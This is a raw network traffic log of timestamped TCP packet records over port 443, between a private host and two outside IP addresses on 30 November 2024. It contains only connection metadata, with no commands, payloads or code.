                                                                                                              Nov 30, 2024 01:25:01.987207890 CET4434970720.233.83.145192.168.2.6
                                                                                                              Nov 30, 2024 01:25:02.037473917 CET49707443192.168.2.620.233.83.145
                                                                                                              Nov 30, 2024 01:25:02.063817978 CET49707443192.168.2.620.233.83.145
                                                                                                              Nov 30, 2024 01:25:02.107338905 CET4434970720.233.83.145192.168.2.6
                                                                                                              Nov 30, 2024 01:25:03.256278992 CET4434970720.233.83.145192.168.2.6
                                                                                                              Nov 30, 2024 01:25:03.256659985 CET4434970720.233.83.145192.168.2.6
                                                                                                              Nov 30, 2024 01:25:03.256726980 CET4434970720.233.83.145192.168.2.6
                                                                                                              Nov 30, 2024 01:25:03.256737947 CET49707443192.168.2.620.233.83.145
                                                                                                              Nov 30, 2024 01:25:03.256791115 CET49707443192.168.2.620.233.83.145
                                                                                                              Nov 30, 2024 01:25:03.256908894 CET49707443192.168.2.620.233.83.145
                                                                                                              Nov 30, 2024 01:25:03.256926060 CET4434970720.233.83.145192.168.2.6
                                                                                                              Nov 30, 2024 01:25:03.256936073 CET49707443192.168.2.620.233.83.145
                                                                                                              Nov 30, 2024 01:25:03.256939888 CET4434970720.233.83.145192.168.2.6
                                                                                                              Nov 30, 2024 01:25:03.399682045 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:03.399729967 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:03.399796963 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:03.400105953 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:03.400118113 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:04.664747953 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:04.664851904 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:04.670922995 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:04.670933008 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:04.671148062 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:04.672833920 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:04.719331026 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:05.255795002 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:05.256213903 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:05.256233931 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:05.256254911 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:05.256261110 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:05.256289005 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:05.256304979 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:05.264250040 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:05.264297009 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:05.264312983 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:05.272631884 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:05.272708893 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:05.272721052 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:05.289444923 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:05.289490938 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:05.289501905 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:05.289518118 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:05.289557934 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:05.375895023 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:05.428154945 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:05.457034111 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:05.460969925 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:05.461045980 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:05.461078882 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:05.469281912 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:05.469346046 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:05.469367981 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:05.477628946 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:05.477719069 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:05.477745056 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:05.485905886 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:05.485991001 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:05.486011982 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:05.494187117 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:05.494261026 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:05.494282007 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:05.502469063 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:05.502551079 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:05.502566099 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:05.518982887 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:05.519026041 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:05.519073963 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:05.519088030 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:05.519141912 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:05.525465012 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:05.531902075 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:05.531974077 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:05.531987906 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:05.538423061 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:05.538485050 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:05.538499117 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:05.584410906 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:05.584438086 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:05.631293058 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:05.658416986 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:05.658478975 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:05.658596992 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:05.658627987 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:05.689162970 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:05.689173937 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:05.689209938 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:05.689234972 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:05.689241886 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:05.689291954 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:05.689306021 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:05.689332008 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:05.689352036 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:05.720921993 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:05.720941067 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:05.720962048 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:05.720968962 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:05.720973015 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:05.721002102 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:05.721066952 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:05.721087933 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:05.721123934 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:05.752839088 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:05.752863884 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:05.752887011 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:05.752892971 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:05.753022909 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:05.753057957 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:05.803169966 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:05.874823093 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:05.874839067 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:05.874861002 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:05.874871016 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:05.874901056 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:05.874903917 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:05.874921083 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:05.874943972 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:05.874959946 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:05.898086071 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:05.898101091 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:05.898137093 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:05.898169994 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:05.898185968 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:05.898200035 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:05.898226023 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:05.898245096 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:05.917953014 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:05.917972088 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:05.918051004 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:05.918061972 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:05.918107033 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:05.941204071 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:05.941225052 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:05.941289902 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:05.941301107 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:05.941339970 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:05.964139938 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:05.964157104 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:05.964255095 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:05.964266062 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:05.964313984 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:06.067110062 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:06.067128897 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:06.067240000 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:06.067257881 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:06.067302942 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:06.081593990 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:06.081609011 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:06.081682920 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:06.081691980 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:06.081732988 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:06.097141027 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:06.097162962 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:06.097249985 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:06.097259998 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:06.097305059 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:06.111819983 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:06.111839056 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:06.111946106 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:06.111963987 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:06.112013102 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:06.124524117 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:06.124538898 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:06.124641895 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:06.124653101 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:06.124695063 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:06.140266895 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:06.140283108 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:06.140371084 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:06.140381098 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:06.140417099 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:06.152998924 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:06.153017044 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:06.153084040 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:06.153090954 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:06.153132915 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:06.167737961 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:06.167753935 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:06.167824030 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:06.167834044 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:06.167872906 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:06.269207001 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:06.269229889 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:06.269357920 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:06.269372940 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:06.269421101 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:06.279444933 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:06.279460907 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:06.279536963 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:06.279546022 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:06.279580116 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:06.287933111 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:06.287950039 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:06.288031101 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:06.288038969 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:06.288080931 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:06.298192024 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:06.298213005 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:06.298283100 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:06.298295021 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:06.298332930 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:06.306993961 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:06.307010889 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:06.307126999 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:06.307137012 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:06.307187080 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:06.316082954 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:06.316102028 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:06.316175938 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:06.316185951 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:06.316222906 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:06.324428082 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:06.324443102 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:06.324507952 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:06.324517012 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:06.324558020 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:06.332564116 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:06.332585096 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:06.332655907 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:06.332664967 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:06.332705021 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:06.468626976 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:06.468682051 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:06.468808889 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:06.468839884 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:06.468883991 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:06.475172997 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:06.475192070 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:06.475263119 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:06.475271940 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:06.475317955 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:06.482650995 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:06.482667923 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:06.482757092 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:06.482765913 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:06.482805014 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:06.490030050 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:06.490047932 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:06.490109921 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:06.490120888 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:06.490160942 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:06.497008085 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:06.497024059 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:06.497091055 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:06.497102022 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:06.497143984 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:06.504487991 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:06.504503965 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:06.504561901 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:06.504568100 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:06.504609108 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:06.511058092 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:06.511073112 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:06.511138916 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:06.511147022 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:06.511171103 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:06.511190891 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:06.542361975 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:06.542377949 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:06.542438030 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:06.542447090 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:06.542486906 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:06.674519062 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:06.674537897 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:06.674626112 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:06.674649954 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:06.674693108 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:06.681834936 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:06.681855917 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:06.681927919 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:06.681936979 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:06.681962967 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:06.681983948 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:06.689333916 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:06.689348936 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:06.689407110 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:06.689414978 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:06.689450979 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:06.695890903 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:06.695915937 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:06.695979118 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:06.695990086 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:06.696024895 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:06.702888012 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:06.702914000 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:06.702951908 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:06.702980042 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:06.702996969 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:06.703016996 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:06.710345030 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:06.710370064 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:06.710438013 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:06.710469007 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:06.710506916 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:06.717716932 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:06.717735052 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:06.717808962 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:06.717832088 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:06.717873096 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:06.743653059 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:06.743670940 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:06.743772030 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:06.743798971 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:06.743845940 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:06.876394987 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:06.876422882 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:06.876540899 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:06.876570940 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:06.876620054 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:06.883116961 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:06.883136988 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:06.883235931 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:06.883255959 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:06.883294106 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:06.890295029 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:06.890316963 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:06.890391111 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:06.890408039 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:06.890454054 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:06.897794962 CET44349709185.199.108.133192.168.2.6
